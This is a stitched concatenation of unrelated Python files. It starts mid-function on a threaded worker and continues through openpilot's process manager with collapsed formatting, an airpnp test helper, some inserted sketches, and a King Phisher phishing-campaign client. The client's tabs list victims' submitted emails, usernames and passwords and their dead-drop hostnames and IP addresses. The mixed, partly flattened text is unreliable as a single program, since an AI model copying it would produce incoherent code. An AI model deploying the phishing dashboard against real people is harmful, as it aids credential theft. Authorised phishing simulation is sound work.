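        while work and run_flag.is_set():
            try:
                item = work.pop()
            except IndexError:  # another worker drained the queue first
                break
            try:
                fetch_one(item)  # e.g. perform one HTTP download
            except Exception as exc:
                print(exc)
                run_flag.clear()  # stop the remaining workers

    threads = [threading.Thread(target=worker)
               for _ in range(min(num_threads, len(work)) or 1)]
    for t in threads:
        t.daemon = True
        t.start()
    for t in threads:
        t.join()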
manager.py
#!/usr/bin/env python3 import os import time import sys import fcntl import errno import signal import shutil import subprocess import datetime import textwrap from typing import Dict, List from selfdrive.swaglog import cloudlog, add_logentries_handler from common.basedir import BASEDIR, PARAMS from common.android import ANDROID WEBCAM = os.getenv("WEBCAM") is not None sys.path.append(os.path.join(BASEDIR, "pyextra")) os.environ['BASEDIR'] = BASEDIR TOTAL_SCONS_NODES = 1140 prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt')) # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") if ANDROID: os.chmod("/dev/shm", 0o777) def unblock_stdout(): # get a non-blocking stdout child_pid, child_pty = os.forkpty() if child_pid != 0: # parent # child is in its own process group, manually pass kill signals signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT)) signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM)) fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK) while True: try: dat = os.read(child_pty, 4096) except OSError as e: if e.errno == errno.EIO: break continue if not dat: break try: sys.stdout.write(dat.decode('utf8')) except (OSError, IOError, UnicodeDecodeError): pass # os.wait() returns a tuple with the pid and a 16 bit value # whose low byte is the signal number and whose high byte is the exit satus exit_status = os.wait()[1] >> 8 os._exit(exit_status) if __name__ == "__main__": unblock_stdout() if __name__ == "__main__" and ANDROID: from common.spinner import Spinner from common.text_window import TextWindow else: from common.spinner import FakeSpinner as Spinner from common.text_window import FakeTextWindow as TextWindow import importlib import traceback from multiprocessing import Process # Run scons spinner = Spinner() spinner.update("0") if not prebuilt: for retry in [True, False]: # run scons env = os.environ.copy() env['SCONS_PROGRESS'] = "1" env['SCONS_CACHE'] = "1" nproc = os.cpu_count() j_flag = "" if nproc is None else "-j%d" % (nproc - 1) scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE) compile_output = [] # Read progress from stderr and update spinner while scons.poll() is None: try: line = scons.stderr.readline() # type: ignore if line is None: continue line = line.rstrip() prefix = b'progress: ' if line.startswith(prefix): i = int(line[len(prefix):]) if spinner is not None: spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES))) elif len(line): compile_output.append(line) print(line.decode('utf8', 'replace')) except Exception: pass if scons.returncode != 0: # Read remaining output r = scons.stderr.read().split(b'\n') # type: ignore compile_output += r if retry: print("scons build failed, cleaning in") for i in range(3,-1,-1): print("....%d" % i) time.sleep(1) subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env) shutil.rmtree("/tmp/scons_cache") else: # Build failed log errors errors = [line.decode('utf8', 'replace') for line in compile_output if any([err in line for err in [b'error: ', b'not found, needed by target']])] error_s = "\n".join(errors) add_logentries_handler(cloudlog) cloudlog.error("scons build failed\n" + error_s) # Show TextWindow error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors]) with TextWindow("Openpilot failed to build\n \n" + error_s) as t: t.wait_for_exit() exit(1) else: 
break import cereal import cereal.messaging as messaging from common.params import Params import selfdrive.crash as crash from selfdrive.registration import register from selfdrive.version import version, dirty from selfdrive.loggerd.config import ROOT from selfdrive.launcher import launcher from common import android from common.apk import update_apks, pm_apply_packages, start_offroad from common.manager_helpers import print_cpu_usage ThermalStatus = cereal.log.ThermalData.ThermalStatus # comment out anything you don't want to run managed_processes = { "thermald": "selfdrive.thermald.thermald", "uploader": "selfdrive.loggerd.uploader", "deleter": "selfdrive.loggerd.deleter", "controlsd": "selfdrive.controls.controlsd", "plannerd": "selfdrive.controls.plannerd", "radard": "selfdrive.controls.radard", "dmonitoringd": "selfdrive.controls.dmonitoringd", "ubloxd": ("selfdrive/locationd", ["./ubloxd"]), "loggerd": ("selfdrive/loggerd", ["./loggerd"]), "logmessaged": "selfdrive.logmessaged", "locationd": "selfdrive.locationd.locationd", "tombstoned": "selfdrive.tombstoned", "logcatd": ("selfdrive/logcatd", ["./logcatd"]), "proclogd": ("selfdrive/proclogd", ["./proclogd"]), "boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly "pandad": "selfdrive.pandad", "ui": ("selfdrive/ui", ["./ui"]), "calibrationd": "selfdrive.locationd.calibrationd", "paramsd": ("selfdrive/locationd", ["./paramsd"]), "camerad": ("selfdrive/camerad", ["./camerad"]), "sensord": ("selfdrive/sensord", ["./sensord"]), "clocksd": ("selfdrive/clocksd", ["./clocksd"]), "gpsd": ("selfdrive/sensord", ["./gpsd"]), "updated": "selfdrive.updated", "dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]), "modeld": ("selfdrive/modeld", ["./modeld"]), "driverview": "selfdrive.controls.lib.driverview", } daemon_processes = { "manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"), } running: Dict[str, Process] = {} def get_running(): return running # due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption unkillable_processes = ['camerad'] # processes to end with SIGINT instead of SIGTERM interrupt_processes: List[str] = [] # processes to end with SIGKILL instead of SIGTERM kill_processes = ['sensord', 'paramsd'] # processes to end if thermal conditions exceed Green parameters green_temp_processes = ['uploader'] persistent_processes = [ 'thermald', 'logmessaged', 'ui', 'uploader', ] if ANDROID: persistent_processes += [ 'logcatd', 'tombstoned', 'updated', ] car_started_processes = [ 'controlsd', 'plannerd', 'loggerd', 'radard', 'dmonitoringd', 'calibrationd', 'paramsd', 'camerad', 'modeld', 'proclogd', 'ubloxd', 'locationd', ] if WEBCAM: car_started_processes += [ 'dmonitoringmodeld', ] if ANDROID: car_started_processes += [ 'sensord', 'clocksd', 'gpsd', 'dmonitoringmodeld', 'deleter', ] def register_managed_process(name, desc, car_started=False): global managed_processes, car_started_processes, persistent_processes print("registering %s" % name) managed_processes[name] = desc if car_started: car_started_processes.append(name) else: persistent_processes.append(name) # ****************** process management functions ****************** def nativelauncher(pargs, cwd): # exec the process os.chdir(cwd) # because when extracted from pex zips permissions get lost -_- os.chmod(pargs[0], 0o700) os.execvp(pargs[0], pargs) def start_managed_process(name): if name in running or name not in managed_processes: return proc = managed_processes[name] if isinstance(proc, str): 
cloudlog.info("starting python %s" % proc) running[name] = Process(name=name, target=launcher, args=(proc,)) else: pdir, pargs = proc cwd = os.path.join(BASEDIR, pdir) cloudlog.info("starting process %s" % name) running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd)) running[name].start() def start_daemon_process(name): params = Params() proc, pid_param = daemon_processes[name] pid = params.get(pid_param, encoding='utf-8') if pid is not None: try: os.kill(int(pid), 0) with open(f'/proc/{pid}/cmdline') as f: if proc in f.read(): # daemon is running return except (OSError, FileNotFoundError): # process is dead pass cloudlog.info("starting daemon %s" % name) proc = subprocess.Popen(['python', '-m', proc], stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setpgrp) params.put(pid_param, str(proc.pid)) def prepare_managed_process(p): proc = managed_processes[p] if isinstance(proc, str): # import this python cloudlog.info("preimporting %s" % proc) importlib.import_module(proc) elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")): # build this process cloudlog.info("building %s" % (proc,)) try: subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) except subprocess.CalledProcessError: # make clean if the build failed cloudlog.warning("building %s failed, make clean" % (proc, )) subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0])) subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) def join_process(process, timeout): # Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382 # We have to poll the exitcode instead t = time.time() while time.time() - t < timeout and process.exitcode is None: time.sleep(0.001) def kill_managed_process(name): if name not in running or name not in managed_processes: return cloudlog.info("killing %s" % name) if running[name].exitcode is None: if name in interrupt_processes: os.kill(running[name].pid, signal.SIGINT) elif name in kill_processes: os.kill(running[name].pid, signal.SIGKILL) else: running[name].terminate() join_process(running[name], 5) if running[name].exitcode is None: if name in unkillable_processes: cloudlog.critical("unkillable process %s failed to exit! 
rebooting in 15 if it doesn't die" % name) join_process(running[name], 15) if running[name].exitcode is None: cloudlog.critical("FORCE REBOOTING PHONE!") os.system("date >> /sdcard/unkillable_reboot") os.system("reboot") raise RuntimeError else: cloudlog.info("killing %s with SIGKILL" % name) os.kill(running[name].pid, signal.SIGKILL) running[name].join() cloudlog.info("%s is dead with %d" % (name, running[name].exitcode)) del running[name] def cleanup_all_processes(signal, frame): cloudlog.info("caught ctrl-c %s %s" % (signal, frame)) if ANDROID: pm_apply_packages('disable') for name in list(running.keys()): kill_managed_process(name) cloudlog.info("everything is dead") # ****************** run loop ****************** def manager_init(should_register=True): if should_register: reg_res = register() if reg_res: dongle_id = reg_res else: raise Exception("server registration failed") else: dongle_id = "c"*16 # set dongle id cloudlog.info("dongle id is " + dongle_id) os.environ['DONGLE_ID'] = dongle_id cloudlog.info("dirty is %d" % dirty) if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True) crash.bind_user(id=dongle_id) crash.bind_extra(version=version, dirty=dirty, is_eon=True) os.umask(0) try: os.mkdir(ROOT, 0o777) except OSError: pass # ensure shared libraries are readable by apks if ANDROID: os.chmod(BASEDIR, 0o755) os.chmod(os.path.join(BASEDIR, "cereal"), 0o755) os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755) def manager_thread(): # now loop thermal_sock = messaging.sub_sock('thermal') if os.getenv("GET_CPU_USAGE"): proc_sock = messaging.sub_sock('procLog', conflate=True) cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() # start daemon processes for p in daemon_processes: start_daemon_process(p) # start persistent processes for p in persistent_processes: start_managed_process(p) # start offroad if ANDROID: pm_apply_packages('enable') start_offroad() if os.getenv("NOBOARD") is None: start_managed_process("pandad") if os.getenv("BLOCK") is not None: for k in os.getenv("BLOCK").split(","): del managed_processes[k] logger_dead = False start_t = time.time() first_proc = None while 1: msg = messaging.recv_sock(thermal_sock, wait=True) # heavyweight batch processes are gated on favorable thermal conditions if msg.thermal.thermalStatus >= ThermalStatus.yellow: for p in green_temp_processes: if p in persistent_processes: kill_managed_process(p) else: for p in green_temp_processes: if p in persistent_processes: start_managed_process(p) if msg.thermal.freeSpace < 0.05: logger_dead = True if msg.thermal.started and "driverview" not in running: for p in car_started_processes: if p == "loggerd" and logger_dead: kill_managed_process(p) else: start_managed_process(p) else: logger_dead = False for p in reversed(car_started_processes): kill_managed_process(p) # this is ugly if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1": start_managed_process("driverview") elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0": kill_managed_process("driverview") # check the status of all processes, did any of them die? 
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running] cloudlog.debug(' '.join(running_list)) # Exit main loop when uninstall is needed if params.get("DoUninstall", encoding='utf8') == "1": break if os.getenv("GET_CPU_USAGE"): dt = time.time() - start_t # Get first sample if dt > 30 and first_proc is None: first_proc = messaging.recv_sock(proc_sock) # Get last sample and exit if dt > 90: last_proc = messaging.recv_sock(proc_sock, wait=True) cleanup_all_processes(None, None) sys.exit(print_cpu_usage(first_proc, last_proc)) def manager_prepare(spinner=None): # build all processes os.chdir(os.path.dirname(os.path.abspath(__file__))) # Spinner has to start from 70 here total = 100.0 if prebuilt else 30.0 for i, p in enumerate(managed_processes): if spinner is not None: spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),)) prepare_managed_process(p) def uninstall(): cloudlog.warning("uninstalling") with open('/cache/recovery/command', 'w') as f: f.write('--wipe_data\n') # IPowerManager.reboot(confirm=false, reason="recovery", wait=true) android.reboot(reason="recovery") def main(): os.environ['PARAMS_PATH'] = PARAMS # the flippening! os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1') # disable bluetooth os.system('service call bluetooth_manager 8') params = Params() params.manager_start() default_params = [ ("CommunityFeaturesToggle", "0"), ("CompletedTrainingVersion", "0"), ("IsRHD", "0"), ("IsMetric", "0"), ("RecordFront", "0"), ("HasAcceptedTerms", "0"), ("HasCompletedSetup", "0"), ("IsUploadRawEnabled", "1"), ("IsLdwEnabled", "1"), ("IsGeofenceEnabled", "-1"), ("SpeedLimitOffset", "0"), ("LongitudinalControl", "0"), ("LimitSetSpeed", "0"), ("LimitSetSpeedNeural", "0"), ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')), ("OpenpilotEnabledToggle", "1"), ("LaneChangeEnabled", "1"), ("IsDriverViewEnabled", "0"), ] # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this chffrplus? if os.getenv("PASSIVE") is not None: params.put("Passive", str(int(os.getenv("PASSIVE")))) if params.get("Passive") is None: raise Exception("Passive must be set to continue") if ANDROID: update_apks() manager_init() manager_prepare(spinner) spinner.close() if os.getenv("PREPAREONLY") is not None: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except SystemExit: raise except Exception: traceback.print_exc() crash.capture_exception() finally: cleanup_all_processes(None, None) if params.get("DoUninstall", encoding='utf8') == "1": uninstall() if __name__ == "__main__": try: main() except Exception: add_logentries_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(3) error = "Manager failed to start\n \n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
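# --- Illustrative sketch (not part of openpilot) ---------------------------
# kill_managed_process() above escalates gently: SIGINT or SIGKILL for the
# processes listed in interrupt_processes/kill_processes, terminate() for the
# rest, then a polling join (Process.join(timeout) can hang, see
# https://bugs.python.org/issue28382 referenced in join_process), and only
# then a hard SIGKILL. A stripped-down version of that escalation, with a
# hypothetical name, looks like this:
def _graceful_stop_sketch(proc, timeout=5.0):
  """Ask a multiprocessing.Process to exit, then force-kill it if it won't."""
  import os
  import signal
  import time

  if proc.exitcode is not None:
    return proc.exitcode

  proc.terminate()  # SIGTERM first

  deadline = time.time() + timeout
  while time.time() < deadline and proc.exitcode is None:
    time.sleep(0.001)  # poll the exitcode instead of join(timeout)

  if proc.exitcode is None:
    os.kill(proc.pid, signal.SIGKILL)  # escalate
    proc.join()
  return proc.exitcode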
base.py
import sys from subprocess import PIPE, Popen, STDOUT from threading import Thread import os.path import tempfile from Queue import Queue, Empty ON_POSIX = 'posix' in sys.builtin_module_names __all__ = [ "read_until", "AirpnpProcess", ] def enqueue_output(out, queue): for line in iter(out.readline, ''): queue.put(line) out.close() def millis(): import time as time_ #make sure we don't override time return int(round(time_.time() * 1000)) def read_until(q, pattern, timeout=1000): import re start = millis() lines = [] pat = re.compile(pattern) found = False while millis() - start < timeout: try: line = q.get(timeout=.2) lines.append(line) if pat.match(line): found = True break except Empty: pass return (found, lines) class AirpnpProcess(object): def __init__(self, config={}): self.config = config def create_config(self, config): f = tempfile.NamedTemporaryFile(delete=True) f.write("[airpnp]\n") for k, v in config.items(): f.write("%s=%s\n" % (k, v)) f.flush() return f.name def __enter__(self): configfn = self.create_config(self.config) args = ["twistd", "-n", "airpnp", "-c", configfn] cwd = os.path.join(os.path.dirname(__file__), "..") self.proc = Popen(args, stdout=PIPE, stderr=STDOUT, cwd=cwd, close_fds=ON_POSIX, bufsize=1) q = Queue() t = Thread(target=enqueue_output, args=(self.proc.stdout, q)) t.daemon = True t.start() return q def __exit__(self, type, value, tb): self.proc.kill()
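# Self-contained usage sketch of the non-blocking reader pattern from base.py,
# ported to Python 3 (queue instead of Queue) and driven by a throwaway child
# process instead of twistd/airpnp; the command line below is illustrative only.
import sys
from queue import Empty, Queue
from subprocess import PIPE, Popen, STDOUT
from threading import Thread


def enqueue_output(out, q):
    # Same idea as base.py: a daemon thread drains the pipe so reads never block.
    for line in iter(out.readline, b''):
        q.put(line.decode(errors='replace'))
    out.close()


proc = Popen([sys.executable, '-c', 'print("server ready"); print("done")'],
             stdout=PIPE, stderr=STDOUT)
q = Queue()
Thread(target=enqueue_output, args=(proc.stdout, q), daemon=True).start()

# Drain whatever arrives within a short window, roughly what read_until() does.
lines = []
try:
    while True:
        lines.append(q.get(timeout=0.5))
except Empty:
    pass
print(lines)
proc.wait()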
campaign.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # king_phisher/client/tabs/campaign.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # import datetime import logging import threading import time from king_phisher import find from king_phisher import ipaddress from king_phisher import utilities from king_phisher.client import export from king_phisher.client import graphs from king_phisher.client import gui_utilities from king_phisher.client.widget import extras from king_phisher.client.widget import managers from boltons import iterutils from gi.repository import GdkPixbuf from gi.repository import GLib from gi.repository import Gtk from smoke_zephyr.utilities import parse_timespan UNKNOWN_LOCATION_STRING = 'N/A (Unknown)' class CampaignViewGenericTab(gui_utilities.GladeGObject): """ This object is meant to be subclassed by all of the tabs which load and display information about the current campaign. 
""" label_text = 'Unknown' """The label of the tab for display in the GUI.""" top_gobject = 'box' def __init__(self, *args, **kwargs): super(CampaignViewGenericTab, self).__init__(*args, **kwargs) self.label = Gtk.Label(label=self.label_text) """The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`.""" self.is_destroyed = threading.Event() getattr(self, self.top_gobject).connect('destroy', self.signal_destroy) self.last_load_time = float('-inf') """The last time the data was loaded from the server.""" self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m'))) """The lifetime in seconds to wait before refreshing the data from the server.""" self.loader_thread = None """The thread object which loads the data from the server.""" self.loader_thread_lock = threading.Lock() """The :py:class:`threading.Lock` object used for synchronization between the loader and main threads.""" self.loader_thread_stop = threading.Event() """The :py:class:`threading.Event` object used to request that the loader thread stop before completion.""" self.application.connect('campaign-set', self.signal_kpc_campaign_set) def _sync_loader_thread(self): """ Synchronize the loader thread by ensuring that it is stopped. If it is currently running, this will use :py:attr:`~.loader_thread_stop` to request that the loader stops early. """ if not self.loader_thread_is_running: return # it's alive so tell it to stop, wait for it, then proceed self.loader_thread_stop.set() while self.loader_thread.is_alive(): gui_utilities.gtk_sync() self.loader_thread.join(1) @property def rpc(self): return self.application.rpc @property def loader_thread_is_running(self): if self.loader_thread is None: return False return self.loader_thread.is_alive() def load_campaign_information(self, force=True): raise NotImplementedError() def signal_button_clicked_refresh(self, button): self.load_campaign_information() def signal_destroy(self, gobject): self.is_destroyed.set() self.loader_thread_stop.set() if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive(): self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident)) while self.loader_thread.is_alive(): gui_utilities.gtk_sync() self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident)) def signal_kpc_campaign_set(self, kpc, cid): self.load_campaign_information() class CampaignViewGenericTableTab(CampaignViewGenericTab): """ This object is meant to be subclassed by tabs which will display campaign information of different types from specific database tables. The data in this object is refreshed when multiple events occur and it uses an internal timer to represent the last time the data was refreshed. 
""" dependencies = gui_utilities.GladeDependencies( children=( 'button_refresh', 'treeview_campaign' ) ) remote_table_name = '' """The database table represented by this tab.""" view_columns = () """The dictionary map of column numbers to column names starting at column 1.""" def __init__(self, *args, **kwargs): super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs) treeview = self.gobjects['treeview_campaign'] self.treeview_manager = managers.TreeViewManager( treeview, selection_mode=Gtk.SelectionMode.MULTIPLE, cb_delete=self._prompt_to_delete_row, cb_refresh=self.load_campaign_information ) self.treeview_manager.set_column_titles(self.view_columns, column_offset=1) self.popup_menu = self.treeview_manager.get_popup_menu() """The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area.""" treeview = self.gobjects['treeview_campaign'] store_columns = [str] * (len(self.view_columns) + 1) store = Gtk.ListStore(*store_columns) treeview.set_model(store) def _prompt_to_delete_row(self, treeview, _): if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive(): gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent) return model = treeview.get_model() row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)] if len(row_ids) == 0: return elif len(row_ids) == 1: message = 'Delete This Row?' else: message = "Delete These {0:,} Rows?".format(len(row_ids)) if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'): return self.application.emit(self.remote_table_name[:-1] + '-delete', row_ids) self.load_campaign_information() def format_row_data(self, row): """ This method is overridden by subclasses to format the raw row data returned from the server. The length of the list must equal the number of columns in the table. This method is called for each row in the remote table by the loader thread. :return: The formated row data. :rtype: list """ raise NotImplementedError() def format_cell_data(self, cell_data): """ This method provides formatting to the individual cell values returned from the :py:meth:`.format_row_data` function. Values are converted into a format suitable for reading. :param cell: The value to format. :return: The formatted cell value. :rtype: str """ if isinstance(cell_data, datetime.datetime): cell_data = utilities.datetime_utc_to_local(cell_data) return utilities.format_datetime(cell_data) elif cell_data is None: return '' return str(cell_data) def load_campaign_information(self, force=True): """ Load the necessary campaign information from the remote server. Unless *force* is True, the :py:attr:`~.CampaignViewGenericTab.last_load_time` is compared with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to check if the information is stale. If the local data is not stale, this function will return without updating the table. :param bool force: Ignore the load life time and force loading the remote data. 
""" if not force and ((time.time() - self.last_load_time) < self.refresh_frequency): return self.loader_thread_lock.acquire() self._sync_loader_thread() self.loader_thread_stop.clear() store = self.gobjects['treeview_campaign'].get_model() store.clear() self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,)) self.loader_thread.daemon = True self.loader_thread.start() self.loader_thread_lock.release() return def loader_thread_routine(self, store): """ The loading routine to be executed within a thread. :param store: The store object to place the new data. :type store: :py:class:`Gtk.ListStore` """ gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False)) for row in self.rpc.remote_table(self.remote_table_name, query_filter={'campaign_id': self.config['campaign_id']}): if self.loader_thread_stop.is_set(): break if self.is_destroyed.is_set(): break if self.rpc is None: break row_data = self.format_row_data(row) if row_data is None: self.rpc('db/table/delete', self.remote_table_name, row.id) continue row_data = list(map(self.format_cell_data, row_data)) row_data.insert(0, str(row.id)) gui_utilities.glib_idle_add_wait(store.append, row_data) if self.is_destroyed.is_set(): return gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True)) self.last_load_time = time.time() def signal_button_clicked_export(self, button): self.export_table_to_csv() def export_table_to_csv(self): """Export the data represented by the view to a CSV file.""" if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()): gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent) return dialog = extras.FileChooserDialog('Export Data', self.parent) file_name = self.config['campaign_name'] + '.csv' response = dialog.run_quick_save(file_name) dialog.destroy() if not response: self.loader_thread_lock.release() return destination_file = response['target_path'] store = self.gobjects['treeview_campaign'].get_model() columns = dict(enumerate(('UID',) + self.view_columns)) export.liststore_to_csv(store, destination_file, columns) self.loader_thread_lock.release() def export_table_to_xlsx_worksheet(self, worksheet, title_format): """ Export the data represented by the view to an XLSX worksheet. :param worksheet: The destination sheet for the store's data. :type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet` :param title_format: The formatting to use for the title row. 
:type title_format: :py:class:`xlsxwriter.format.Format` """ if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()): gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent) return store = self.gobjects['treeview_campaign'].get_model() columns = dict(enumerate(('UID',) + self.view_columns)) export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format) self.loader_thread_lock.release() class CampaignViewDeaddropTab(CampaignViewGenericTableTab): """Display campaign information regarding dead drop connections.""" remote_table_name = 'deaddrop_connections' label_text = 'Deaddrop' view_columns = ( 'Destination', 'Visit Count', 'IP Address', 'Username', 'Hostname', 'Local IP Addresses', 'First Hit', 'Last Hit' ) def format_row_data(self, connection): deploy_details = self.rpc.remote_table_row('deaddrop_deployments', connection.deployment_id, cache=True) if not deploy_details: return None row = ( deploy_details.destination, connection.visit_count, connection.visitor_ip, connection.local_username, connection.local_hostname, connection.local_ip_addresses, connection.first_visit, connection.last_visit ) return row class CampaignViewCredentialsTab(CampaignViewGenericTableTab): """Display campaign information regarding submitted credentials.""" remote_table_name = 'credentials' label_text = 'Credentials' view_columns = ( 'Email Address', 'Username', 'Password', 'Submitted' ) def __init__(self, *args, **kwargs): super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs) treeview = self.gobjects['treeview_campaign'] pwd_column_id = self.view_columns.index('Password') treeview.get_column(pwd_column_id).set_property('visible', False) def format_row_data(self, credential): msg_details = self.rpc.remote_table_row('messages', credential.message_id, cache=True) if not msg_details: return None row = ( msg_details.target_email, credential.username, credential.password, credential.submitted ) return row def signal_button_toggled_show_passwords(self, button): treeview = self.gobjects['treeview_campaign'] pwd_column_id = self.view_columns.index('Password') treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active')) class CampaignViewDashboardTab(CampaignViewGenericTab): """Display campaign information on a graphical dash board.""" dependencies = gui_utilities.GladeDependencies( children=( 'box_top_left', 'box_top_right', 'box_bottom', 'scrolledwindow_top_left', 'scrolledwindow_top_right', 'scrolledwindow_bottom' ) ) label_text = 'Dashboard' """The tabs label for display in the GUI.""" def __init__(self, *args, **kwargs): super(CampaignViewDashboardTab, self).__init__(*args, **kwargs) self.graphs = [] """The :py:class:`.CampaignGraph` classes represented on the dash board.""" dash_ports = { # dashboard position, (width, height) 'top_left': (380, 200), 'top_right': (380, 200), 'bottom': (760, 200) } for dash_port, details in dash_ports.items(): graph_name = self.config['dashboard.' 
+ dash_port] cls = graphs.get_graph(graph_name) if not cls: self.logger.warning('could not get graph: ' + graph_name) logo_file_path = find.find_data_file('king-phisher-icon.svg') if logo_file_path: image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128)) image.show() self.gobjects['scrolledwindow_' + dash_port].add(image) continue graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context()) self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas) self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0) self.graphs.append(graph_inst) self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency)) GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine) def load_campaign_information(self, force=True): """ Load the necessary campaign information from the remote server. Unless *force* is True, the :py:attr:`~.last_load_time` is compared with the :py:attr:`~.refresh_frequency` to check if the information is stale. If the local data is not stale, this function will return without updating the table. :param bool force: Ignore the load life time and force loading the remote data. """ if not force and ((time.time() - self.last_load_time) < self.refresh_frequency): return if not self.application.rpc: self.logger.warning('skipping load_campaign_information because rpc is not initialized') return with self.loader_thread_lock: self._sync_loader_thread() self.loader_thread_stop.clear() self.loader_thread = threading.Thread(target=self.loader_thread_routine) self.loader_thread.daemon = True self.loader_thread.start() def loader_idle_routine(self): """The routine which refreshes the campaign data at a regular interval.""" if self.rpc and not self.loader_thread_is_running: self.logger.debug('idle loader routine called') self.load_campaign_information() return True def loader_thread_routine(self): """The loading routine to be executed within a thread.""" if not 'campaign_id' in self.config: return if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']): return info_cache = {} for graph in self.graphs: if self.loader_thread_stop.is_set(): break if self.is_destroyed.is_set(): break info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop))) 